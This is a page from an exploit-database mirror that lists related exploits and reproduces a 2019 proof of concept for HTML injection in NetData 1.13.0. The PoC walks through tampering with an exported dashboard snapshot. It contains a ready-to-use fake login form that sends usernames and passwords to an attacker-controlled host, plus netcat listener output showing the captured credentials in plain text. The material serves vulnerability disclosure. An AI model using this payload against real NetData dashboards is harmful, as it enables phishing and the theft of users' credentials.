Menu

Improved exploit search engine. Try it out

"NetData 1.13.0 - HTML Injection"

Author

s4vitar

Platform

multiple

Release date

2019-03-15

Release Date Title Type Platform Author
2019-06-18 "Sahi pro 8.x - Cross-Site Scripting" webapps multiple "Goutham Madhwaraj"
2019-06-18 "Sahi pro 8.x - SQL Injection" webapps multiple "Goutham Madhwaraj"
2019-06-18 "Sahi pro 7.x/8.x - Directory Traversal" webapps multiple "Goutham Madhwaraj"
2019-06-17 "RedwoodHQ 2.5.5 - Authentication Bypass" webapps multiple EthicalHCOP
2019-06-17 "Thunderbird ESR < 60.7.XXX - 'icalrecur_add_bydayrules' Stack-Based Buffer Overflow" dos multiple "X41 D-Sec GmbH"
2019-06-17 "Thunderbird ESR < 60.7.XXX - 'parser_get_next_char' Heap-Based Buffer Overflow" dos multiple "X41 D-Sec GmbH"
2019-06-17 "Thunderbird ESR < 60.7.XXX - 'icalmemorystrdupanddequote' Heap-Based Buffer Overflow" dos multiple "X41 D-Sec GmbH"
2019-06-17 "Thunderbird ESR < 60.7.XXX - Type Confusion" dos multiple "X41 D-Sec GmbH"
2019-06-05 "Google Chrome 73.0.3683.103 - 'WasmMemoryObject::Grow' Use-After-Free" dos multiple "Google Security Research"
2019-05-28 "Phraseanet < 4.0.7 - Cross-Site Scripting" webapps multiple "Krzysztof Szulski"
2019-05-27 "Deltek Maconomy 2.2.5 - Local File Inclusion" webapps multiple JameelNabbo
2019-05-29 "Spidermonkey - IonMonkey Unexpected ObjectGroup in ObjectGroupDispatch Operation" dos multiple "Google Security Research"
2019-05-29 "Spidermonkey - IonMonkey Leaks JS_OPTIMIZED_OUT Magic Value to Script" dos multiple "Google Security Research"
2019-05-22 "Zoho ManageEngine ServiceDesk Plus 9.3 - Cross-Site Scripting" webapps multiple Vingroup
2019-05-22 "Zoho ManageEngine ServiceDesk Plus < 10.5 - Improper Access Restrictions" webapps multiple Vingroup
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 XNU - 'in6_pcbdetach' Stale Pointer Use-After-Free" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 XNU - Wild-read due to bad cast in stf_ioctl" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - AIR Optimization Incorrectly Removes Assignment to Register" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT Leaves Stack Variable Uninitialized" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 DFG JIT Compiler - 'HasIndexedProperty' Use-After-Free" dos multiple "Google Security Research"
2019-05-21 "Deluge 1.3.15 - 'URL' Denial of Service (PoC)" dos multiple "Victor Mondragón"
2019-05-13 "Google Chrome V8 - Turbofan JSCallReducer::ReduceArrayIndexOfIncludes Out-of-Bounds Read/Write" dos multiple "Google Security Research"
2019-05-10 "CyberArk Enterprise Password Vault 10.7 - XML External Entity Injection" webapps multiple "Marcelo Toran"
2019-05-10 "TheHive Project Cortex < 1.15.2 - Server-Side Request Forgery" webapps multiple "Alexandre Basquin"
2019-05-07 "Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting" webapps multiple alt3kx
2019-05-08 "Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)" remote multiple Metasploit
2019-05-08 "PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)" remote multiple Metasploit
2019-05-06 "ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution" webapps multiple "Gilson Camelo"
2019-05-03 "Zotonic < 0.47.0 mod_admin - Cross-Site Scripting" webapps multiple "Ramòn Janssen"
2019-04-30 "Domoticz 4.10577 - Unauthenticated Remote Command Execution" webapps multiple "Fabio Carretto"
Release Date Title Type Platform Author
2019-06-14 "CentOS 7.6 - 'ptrace_scope' Privilege Escalation" local linux s4vitar
2019-06-10 "Ubuntu 18.04 - 'lxd' Privilege Escalation" local linux s4vitar
2019-03-15 "NetData 1.13.0 - HTML Injection" webapps multiple s4vitar
2019-02-28 "FTP Server 1.32 - Denial of Service" dos android s4vitar
2019-02-21 "AirDrop 2.0 - Denial of Service (DoS)" dos android s4vitar
2019-02-21 "ScreenStream 3.0.15 - Denial of Service" dos android s4vitar
2019-02-15 "AirMore 1.6.1 - Denial of Service (PoC)" dos android s4vitar
2019-02-14 "ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (PoC)" dos android s4vitar
2019-02-11 "AirDroid 4.2.1.6 - Denial of Service" dos android s4vitar
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46545/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46545/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46545/40994/netdata-1130-html-injection/download/", "exploit_id": "46545", "exploit_description": "\"NetData 1.13.0 - HTML Injection\"", "exploit_date": "2019-03-15", "exploit_author": "s4vitar", "exploit_type": "webapps", "exploit_platform": "multiple", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
# ************************************************************************
# *                Author: Marcelo Vázquez (aka s4vitar)                 *
# *            NetData v1.13.0 HTML Injection Vulnerability              *
# ************************************************************************

# Exploit Title: NetData v1.13.0 HTML Injection Vulnerability
# Date: 2019-03-14
# Exploit Author: Marcelo Vázquez (aka s4vitar)
# Collaborators: Victor Lasa (aka vowkin)
# Vendor Homepage: https://my-netdata.io/
# Software Link: https://docs.netdata.cloud/packaging/installer/
# Version: <= NetData v1.13.0
# PoC Video (Credential Harvesting): https://www.youtube.com/watch?v=zSG93yX0B8k

NetData is prone to multiple HTML-injection vulnerabilities.

Successful exploitation will allow attacker-supplied HTML to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

NetData 1.13.0 is vulnerable; other versions may also be affected. 

Proof of Concept:
=====================

1. Export a valid snapshot using the "export/save a netdata snapshot" function from the NetData dashboard (top right on the navigation bar).

2. Once it has finished exporting, attackers can manipulate the contents of said snapshot file and inject their own malicious HTML code. An example is provided below:

<div style='position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;'>Please login with valid credentials:<br></br><br>Please enter your credentials to see the content:</br><br><form name='login' action='http://attackerIP:port/'><table><tr><td>Username:</td><td><input type='text' name='username'/></td></tr><tr><td>Password:</td><td><input type='text' name='password'/></td></tr><tr><td colspan=2 align=center><input type='submit' value='Login'/></td></tr></table></form></div>

In this case, the attackers perform a credential theft attack where they specify the public IP and port from their own server, which is listening for new connections in order to receive the stolen credentials in plain text.

3. Import the newly modified snapshot using the "import/load a netdata snapshot" function from the NetData dashboard (top right on the navigation bar).

4. Once imported, the victim will see a login form that asks for their credentials.

5. After they are entered, the attacker can visualize said credentials in plain text on his own server, as they are sent through a simple GET request:

root@vps-server:~# nc -nlvp 4646
Listening on [0.0.0.0] (family 0, port 4646)
Connection from [XX.X.XXX.X] port 4646 [tcp/*] accepted (family 2, sport 36930)          
GET /?username=test&password=passwordexample HTTP/1.1                                    
Host: XXX.XXX.XX.XX:4646
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:19999/
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9,en;q=0.8